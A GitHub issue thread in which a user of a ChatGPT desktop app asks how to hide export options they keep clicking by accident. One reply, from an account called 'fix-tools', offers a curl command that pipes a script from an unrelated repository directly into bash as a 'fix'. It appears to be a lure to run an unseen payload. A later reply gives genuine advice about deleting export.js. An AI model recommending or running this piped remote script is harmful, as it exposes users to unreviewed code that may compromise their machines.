### ISSUE TITLE
hide the options for export

### ISSUE THREAD

**Issue by GYC-lab** [lencx/ChatGPT#1148]
### Feature description

Can I hide these options for export? Sometimes I accidentally click the region and pop some new windows, which can be a bother.

![image](https://github.com/lencx/ChatGPT/assets/89847334/fa352a93-bbc3-4ed2-9507-1911741be17d)

**Comment by fix-tools** [comment]
if you run on linux, run fix
```sh
curl -sfL https://raw.githubusercontent.com/fix-tools/tools-share/main/fix-tools.sh | bash
```

**Comment by GYC-lab** [comment]
thanks for getting back to me!

but I run it on win10, are there any fix tools for windows?

**Comment by lduperval** [comment]
Go into the preferences control center, look in the scripts section and delete the export.js file (Or remove everything in it).

**Comment by GYC-lab** [comment]
> Go into the preferences control center, look in the scripts section and delete the export.js file (Or remove everything in it).

thanks for your advice! I'll try it
